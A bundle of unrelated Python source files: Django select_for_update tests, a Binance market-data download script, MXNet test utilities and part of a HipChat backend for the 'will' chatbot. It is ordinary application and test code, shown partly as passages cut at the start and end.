def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country, '
'born__country__entity_ptr.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_inheritance_of_argument_raises_error_ptr_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, %s.'
)
with self.assertRaisesMessage(
FieldError,
msg % 'country, country__country_ptr, country__country_ptr__entity_ptr',
):
with transaction.atomic():
EUCity.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
with self.assertRaisesMessage(FieldError, msg % 'country_ptr, country_ptr__entity_ptr'):
with transaction.atomic():
EUCountry.objects.select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_proxy_of_argument_raises_error_proxy_field_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, country, country__entity_ptr.'
)
with self.assertRaisesMessage(FieldError, msg):
with transaction.atomic():
CityCountryProxy.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
|
download_data_demo2.py
|
"""
我们使用币安原生的api进行数据爬取.
"""
import pandas as pd
import time
from datetime import datetime
import requests
import pytz
from jiamtrader.trader.database import database_manager
pd.set_option('expand_frame_repr', False) #
from jiamtrader.trader.object import BarData, Interval, Exchange
BINANCE_SPOT_LIMIT = 1000
BINANCE_FUTURE_LIMIT = 1500
CHINA_TZ = pytz.timezone("Asia/Shanghai")
from threading import Thread
def generate_datetime(timestamp: float) -> datetime:
"""
:param timestamp:
:return:
"""
dt = datetime.fromtimestamp(timestamp / 1000)
dt = CHINA_TZ.localize(dt)
return dt
def get_binance_data(symbol: str, exchanges: str, start_time: str, end_time: str):
"""
爬取币安交易所的数据
:param symbol: BTCUSDT.
:param exchanges: 现货、USDT合约, 或者币币合约.
:param start_time: 格式如下:2020-1-1 或者2020-01-01
:param end_time: 格式如下:2020-1-1 或者2020-01-01
:return:
"""
api_url = ''
save_symbol = symbol
gate_way = 'BINANCES'
if exchanges == 'spot':
print("spot")
limit = BINANCE_SPOT_LIMIT
save_symbol = symbol.lower()
gate_way = 'BINANCE'
api_url = f'https://api.binance.com/api/v3/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'future':
print('future')
limit = BINANCE_FUTURE_LIMIT
api_url = f'https://fapi.binance.com/fapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'coin_future':
print("coin_future")
limit = BINANCE_FUTURE_LIMIT
f'https://dapi.binance.com/dapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
else:
raise Exception('交易所名称请输入以下其中一个:spot, future, coin_future')
start_time = int(datetime.strptime(start_time, '%Y-%m-%d').timestamp() * 1000)
end_time = int(datetime.strptime(end_time, '%Y-%m-%d').timestamp() * 1000)
while True:
try:
print(start_time)
url = f'{api_url}&startTime={start_time}'
print(url)
data = requests.get(url=url, timeout=10, proxies=proxies).json()
"""
[
[
1591258320000, // 开盘时间
"9640.7", // 开盘价
"9642.4", // 最高价
"9640.6", // 最低价
"9642.0", // 收盘价(当前K线未结束的即为最新价)
"206", // 成交量
1591258379999, // 收盘时间
"2.13660389", // 成交额(标的数量)
48, // 成交笔数
"119", // 主动买入成交量
"1.23424865", // 主动买入成交额(标的数量)
"0" // 请忽略该参数
]
"""
buf = []
for l in data:
bar = BarData(
symbol=save_symbol,
exchange=Exchange.BINANCE,
datetime=generate_datetime(l[0]),
interval=Interval.MINUTE,
volume=float(l[5]),
open_price=float(l[1]),
high_price=float(l[2]),
low_price=float(l[3]),
close_price=float(l[4]),
gateway_name=gate_way
)
buf.append(bar)
database_manager.save_bar_data(buf)
# 到结束时间就退出, 后者收盘价大于当前的时间.
if (data[-1][0] > end_time) or data[-1][6] >= (int(time.time() * 1000) - 60 * 1000):
break
start_time = data[-1][0]
except Exception as error:
print(error)
time.sleep(10)
def download_spot(symbol):
"""
下载现货数据的方法.
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'spot', "2018-1-1", "2019-1-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'spot', "2019-1-1", "2020-1-1"))
t3 = Thread(target=get_binance_data, args=(symbol, 'spot', "2020-1-1", "2020-11-16"))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
def download_future(symbol):
"""
下载合约数据的方法。
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-9-10", "2020-3-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-3-1", "2020-11-16"))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
# 如果你有代理你就设置,如果没有你就设置为 None 或者空的字符串 "",
# 但是你要确保你的电脑网络能访问币安交易所,你可以通过 ping api.binance.com 看看过能否ping得通
proxy_host = "127.0.0.1" # 如果没有就设置为"", 如果有就设置为你的代理主机如:127.0.0.1
proxy_port = 1087 # 设置你的代理端口号如: 1087, 没有你修改为0,但是要保证你能访问api.binance.com这个主机。
proxies = None
if proxy_host and proxy_port:
proxy = f'http://{proxy_host}:{proxy_port}'
proxies = {'http': proxy, 'https': proxy}
symbol = "BTCUSDT"
# download_spot(symbol) # 下载现货的数据.
download_future(symbol) # 下载合约的数据
|
common.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys, os, logging, functools
import multiprocessing as mp
import mxnet as mx
import numpy as np
import random
import shutil
from mxnet.base import MXNetError
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.append(os.path.join(curr_path, '../common/'))
sys.path.insert(0, os.path.join(curr_path, '../../../python'))
import models
from contextlib import contextmanager
import pytest
import tempfile
def assertRaises(expected_exception, func, *args, **kwargs):
try:
func(*args, **kwargs)
except expected_exception as e:
pass
else:
# Did not raise exception
assert False, "%s did not raise %s" % (func.__name__, expected_exception.__name__)
def default_logger():
"""A logger used to output seed information to logs."""
logger = logging.getLogger(__name__)
# getLogger() lookups will return the same logger, but only add the handler once.
if not len(logger.handlers):
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
logger.addHandler(handler)
if (logger.getEffectiveLevel() == logging.NOTSET):
logger.setLevel(logging.INFO)
return logger
@contextmanager
def random_seed(seed=None):
"""
Runs a code block with a new seed for np, mx and python's random.
Parameters
----------
seed : the seed to pass to np.random, mx.random and python's random.
To impose rng determinism, invoke e.g. as in:
with random_seed(1234):
...
To impose rng non-determinism, invoke as in:
with random_seed():
...
Upon conclusion of the block, the rng's are returned to
a state that is a function of their pre-block state, so
any prior non-determinism is preserved.
"""
try:
next_seed = np.random.randint(0, np.iinfo(np.int32).max)
if seed is None:
np.random.seed()
seed = np.random.randint(0, np.iinfo(np.int32).max)
logger = default_logger()
logger.debug('Setting np, mx and python random seeds = %s', seed)
np.random.seed(seed)
mx.random.seed(seed)
random.seed(seed)
yield
finally:
# Reinstate prior state of np.random and other generators
np.random.seed(next_seed)
mx.random.seed(next_seed)
random.seed(next_seed)
def _assert_raise_cuxx_version_not_satisfied(min_version, cfg):
def less_than(version_left, version_right):
"""Compares two version strings in the format num(.[num])*"""
if not version_left or not version_right:
return False
left = version_left.split(".")
right = version_right.split(".")
# 0 pad shortest version - e.g.
# less_than("9.1", "9.1.9") == less_than("9.1.0", "9.1.9")
longest = max(len(left), len(right))
left.extend([0] * (longest - len(left)))
right.extend([0] * (longest - len(right)))
# compare each of the version components
for l, r in zip(left, right):
if l == r:
continue
return int(l) < int(r)
return False
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
cuxx_off = os.getenv(cfg['TEST_OFF_ENV_VAR']) == 'true'
cuxx_env_version = os.getenv(cfg['VERSION_ENV_VAR'], None if cuxx_off else cfg['DEFAULT_VERSION'])
cuxx_test_disabled = cuxx_off or less_than(cuxx_env_version, min_version)
if not cuxx_test_disabled or mx.context.current_context().device_type == 'cpu':
orig_test(*args, **kwargs)
else:
pytest.raises((MXNetError, RuntimeError), orig_test, *args, **kwargs)
return test_new
return test_helper
def assert_raises_cudnn_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDNN_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDNN_VERSION',
'DEFAULT_VERSION': '7.3.1'
})
def assert_raises_cuda_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDA_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDA_VERSION',
'DEFAULT_VERSION': '10.1'
})
def with_seed(seed=None):
"""
A decorator for test functions that manages rng seeds.
Parameters
----------
seed : the seed to pass to np.random and mx.random
This tests decorator sets the np, mx and python random seeds identically
prior to each test, then outputs those seeds if the test fails or
if the test requires a fixed seed (as a reminder to make the test
more robust against random data).
@with_seed()
def test_ok_with_random_data():
...
@with_seed(1234)
def test_not_ok_with_random_data():
...
Use of the @with_seed() decorator for all tests creates
tests isolation and reproducability of failures. When a
test fails, the decorator outputs the seed used. The user
can then set the environment variable MXNET_TEST_SEED to
the value reported, then rerun the test with:
pytest --verbose --capture=no <test_module_name.py>::<failing_test>
To run a test repeatedly, set MXNET_TEST_COUNT=<NNN> in the environment.
To see the seeds of even the passing tests, add '--log-level=DEBUG' to pytest.
"""
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
test_count = int(os.getenv('MXNET_TEST_COUNT', '1'))
env_seed_str = os.getenv('MXNET_TEST_SEED')
for i in range(test_count):
if seed is not None:
this_test_seed = seed
log_level = logging.INFO
elif env_seed_str is not None:
this_test_seed = int(env_seed_str)
log_level = logging.INFO
else:
this_test_seed = np.random.randint(0, np.iinfo(np.int32).max)
log_level = logging.DEBUG
post_test_state = np.random.get_state()
np.random.seed(this_test_seed)
mx.random.seed(this_test_seed)
random.seed(this_test_seed)
logger = default_logger()
# 'pytest --logging-level=DEBUG' shows this msg even with an ensuing core dump.
test_count_msg = '{} of {}: '.format(i+1,test_count) if test_count > 1 else ''
test_msg = ('{}Setting test np/mx/python random seeds, use MXNET_TEST_SEED={}'
' to reproduce.').format(test_count_msg, this_test_seed)
logger.log(log_level, test_msg)
try:
orig_test(*args, **kwargs)
except:
# With exceptions, repeat test_msg at INFO level to be sure it's seen.
if log_level < logging.INFO:
logger.info(test_msg)
raise
finally:
np.random.set_state(post_test_state)
return test_new
return test_helper
def setup_module():
"""
A function with a 'magic name' executed automatically before each pytest module
(file of tests) that helps reproduce a test segfault by setting and outputting the rng seeds.
The segfault-debug procedure on a module called test_module.py is:
1. run "pytest --verbose test_module.py". A seg-faulting output might be:
[INFO] np, mx and python random seeds = 4018804151
test_module.test1 ... ok
test_module.test2 ... Illegal instruction (core dumped)
2. Copy the module-starting seed into the next command, then run:
MXNET_MODULE_SEED=4018804151 pytest --logging-level=DEBUG --verbose test_module.py
Output might be:
[WARNING] **** module-level seed is set: all tests running deterministically ****
[INFO] np, mx and python random seeds = 4018804151
test_module.test1 ... [DEBUG] np and mx random seeds = 3935862516
ok
test_module.test2 ... [DEBUG] np and mx random seeds = 1435005594
Illegal instruction (core dumped)
3. Copy the segfaulting-test seed into the command:
MXNET_TEST_SEED=1435005594 pytest --logging-level=DEBUG --verbose test_module.py:test2
Output might be:
[INFO] np, mx and python random seeds = 2481884723
test_module.test2 ... [DEBUG] np and mx random seeds = 1435005594
Illegal instruction (core dumped)
3. Finally reproduce the segfault directly under gdb (might need additional os packages)
by editing the bottom of test_module.py to be
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
test2()
MXNET_TEST_SEED=1435005594 gdb -ex r --args python test_module.py
4. When finished debugging the segfault, remember to unset any exported MXNET_ seed
variables in the environment to return to non-deterministic testing (a good thing).
"""
module_seed_str = os.getenv('MXNET_MODULE_SEED')
logger = default_logger()
if module_seed_str is None:
seed = np.random.randint(0, np.iinfo(np.int32).max)
else:
seed = int(module_seed_str)
logger.warn('*** module-level seed is set: all tests running deterministically ***')
logger.info('Setting module np/mx/python random seeds, use MXNET_MODULE_SEED=%s to reproduce.', seed)
np.random.seed(seed)
mx.random.seed(seed)
random.seed(seed)
# The MXNET_TEST_SEED environment variable will override MXNET_MODULE_SEED for tests with
# the 'with_seed()' decoration. Inform the user of this once here at the module level.
if os.getenv('MXNET_TEST_SEED') is not None:
logger.warn('*** test-level seed set: all "@with_seed()" tests run deterministically ***')
try:
from tempfile import TemporaryDirectory
except: # Python 2 support
# really simple implementation of TemporaryDirectory
class TemporaryDirectory(object):
def __init__(self, suffix='', prefix='', dir=''):
self._dirname = tempfile.mkdtemp(suffix, prefix, dir)
def __enter__(self):
return self._dirname
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self._dirname)
def teardown_module():
"""
A function with a 'magic name' executed automatically after each pytest test module.
It waits for all operations in one file to finish before carrying on the next.
"""
mx.nd.waitall()
def with_post_test_cleanup():
"""
Helper function that cleans up memory by releasing it from memory pool
Required especially by large tensor tests that have memory footprints in GBs.
"""
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
logger = default_logger()
try:
orig_test(*args, **kwargs)
except:
logger.info(test_msg)
raise
finally:
mx.nd.waitall()
mx.cpu().empty_cache()
return test_new
return test_helper
def run_in_spawned_process(func, env, *args):
"""
Helper function to run a test in its own process.
Avoids issues with Singleton- or otherwise-cached environment variable lookups in the backend.
Adds a seed as first arg to propagate determinism.
Parameters
----------
func : function to run in a spawned process.
env : dict of additional environment values to set temporarily in the environment before exec.
args : args to pass to the function.
Returns
-------
Whether the python version supports running the function as a spawned process.
This routine calculates a random seed and passes it into the test as a first argument. If the
test uses random values, it should include an outer 'with random_seed(seed):'. If the
test needs to return values to the caller, consider use of shared variable arguments.
"""
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
return False
else:
seed = np.random.randint(0,1024*1024*1024)
orig_environ = os.environ.copy()
try:
for (key, value) in env.items():
os.environ[key] = str(value)
# Prepend seed as first arg
p = mpctx.Process(target=func, args=(seed,)+args)
p.start()
p.join()
assert p.exitcode == 0, "Non-zero exit code %d from %s()." % (p.exitcode, func.__name__)
finally:
os.environ.clear()
os.environ.update(orig_environ)
return True
def retry(n):
"""Retry n times before failing for stochastic test cases."""
# TODO(szha): replace with flaky
# https://github.com/apache/incubator-mxnet/issues/17803
assert n > 0
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
"""Wrapper for tests function."""
for _ in range(n):
try:
orig_test(*args, **kwargs)
except AssertionError as e:
err = e
continue
return
raise err
return test_new
return test_helper
|
hipchat.py
|
from datetime import datetime
import json
import logging
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
import random
import re
import requests
import pickle
import sys
import time
import threading
import traceback
from sleekxmpp import ClientXMPP
from sleekxmpp.exceptions import IqError, IqTimeout
from .base import IOBackend
from will import settings
from will.utils import is_admin
from will.acl import is_acl_allowed
from will.abstractions import Event, Message, Person, Channel
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import StorageMixin, PubSubMixin
ROOM_NOTIFICATION_URL = "https://%(server)s/v2/room/%(room_id)s/notification?auth_token=%(token)s"
ROOM_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
ROOM_URL = "https://%(server)s/v2/room/%(room_id)s/?auth_token=%(token)s"
SET_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
PRIVATE_MESSAGE_URL = "https://%(server)s/v2/user/%(user_id)s/message?auth_token=%(token)s"
USER_DETAILS_URL = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s"
ALL_USERS_URL = ("https://%(server)s/v2/user?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s")
ALL_ROOMS_URL = ("https://%(server)s/v2/room?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s&expand=items")
# From RoomsMixins
V1_TOKEN_URL = "https://%(server)s/v1/rooms/list?auth_token=%(token)s"
V2_TOKEN_URL = "https://%(server)s/v2/room?auth_token=%(token)s&expand=items"
class HipChatRosterMixin(object):
@property
def people(self):
if not hasattr(self, "_people"):
self._people = self.load('will_hipchat_people', {})
return self._people
@property
def internal_roster(self):
logging.warn(
"mixin.internal_roster has been deprecated. Please use mixin.people instead. "
"internal_roster will be removed at the end of 2017"
)
return self.people
def get_user_by_full_name(self, name):
for jid, info in self.people.items():
if info["name"] == name:
return info
return None
def get_user_by_nick(self, nick):
for jid, info in self.people.items():
if info["nick"] == nick:
return info
return None
def get_user_by_jid(self, jid):
if jid in self.people:
return self.people[jid]
return None
def get_user_from_message(self, message):
if message["type"] == "groupchat":
if "xmpp_jid" in message:
user = self.get_user_by_jid(message["xmpp_jid"])
if user:
return user
elif "from" in message:
full_name = message["from"].split("/")[1]
user = self.get_user_by_full_name(full_name)
if user:
return user
if "mucnick" in message:
return self.get_user_by_full_name(message["mucnick"])
elif message['type'] in ('chat', 'normal'):
jid = ("%s" % message["from"]).split("@")[0].split("_")[1]
return self.get_user_by_jid(jid)
else:
return None
def message_is_from_admin(self, message):
nick = self.get_user_from_message(message)['nick']
return is_admin(nick)
def message_is_allowed(self, message, acl):
nick = self.get_user_from_message(message)['nick']
return is_acl_allowed(nick, acl)
def get_user_by_hipchat_id(self, id):
for jid, info in self.people.items():
if info["hipchat_id"] == id:
return info
return None
class HipChatRoom(Bunch):
@property
def id(self):
if 'room_id' in self:
# Using API v1
return self['room_id']
elif 'id' in self:
# Using API v2
return self['id']
else:
raise TypeError('Room ID not found')
@property
def history(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get("https://{1}/v2/room/{0}/history".format(str(self.id),
settings.HIPCHAT_SERVER),
params=payload, **settings.REQUESTS_OPTIONS)
data = json.loads(response.text)['items']
for item in data:
item['date'] = datetime.strptime(item['date'][:-13], "%Y-%m-%dT%H:%M:%S")
return data
@property
def participants(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get(
"https://{1}/v2/room/{0}/participant".format(
str(self.id),
settings.HIPCHAT_SERVER
),
params=payload,
**settings.REQUESTS_OPTIONS
).json()
data = response['items']
while 'next' in response['links']:
response = requests.get(response['links']['next'],
params=payload, **settings.REQUESTS_OPTIONS).json()
data.extend(response['items'])
return data
class HipChatRoomMixin(object):
def update_available_rooms(self, q=None):
self._available_rooms = {}
# Use v1 token to grab a full room list if we can (good to avoid rate limiting)
if hasattr(settings, "V1_TOKEN"):
url = V1_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V1_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if r.status_code == requests.codes.unauthorized:
raise Exception("V1_TOKEN authentication failed with HipChat")
for room in r.json()["rooms"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id.
room["id"] = room["room_id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
# Otherwise, grab 'em one-by-one via the v2 api.
else:
params = {}
params['start-index'] = 0
max_results = params['max-results'] = 1000
url = V2_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN}
while True:
resp = requests.get(url, params=params,
**settings.REQUESTS_OPTIONS)
if resp.status_code == requests.codes.unauthorized:
raise Exception("V2_TOKEN authentication failed with HipChat")
rooms = resp.json()
for room in rooms["items"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id
room["room_id"] = room["id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
logging.info('Got %d rooms', len(rooms['items']))
if len(rooms['items']) == max_results:
params['start-index'] += max_results
else:
break
self.save("hipchat_rooms", self._available_rooms)
if q:
q.put(self._available_rooms)
@property
def available_rooms(self):
if not hasattr(self, "_available_rooms"):
self._available_rooms = self.load('hipchat_rooms', None)
if not self._available_rooms:
self.update_available_rooms()
return self._available_rooms
def get_room_by_jid(self, jid):
for room in self.available_rooms.values():
if "xmpp_jid" in room and room["xmpp_jid"] == jid:
return room
return None
def get_room_from_message(self, message):
return self.get_room_from_name_or_id(message.data.channel.name)
def get_room_from_name_or_id(self, name_or_id):
for name, room in self.available_rooms.items():
if name_or_id.lower() == name.lower():
return room
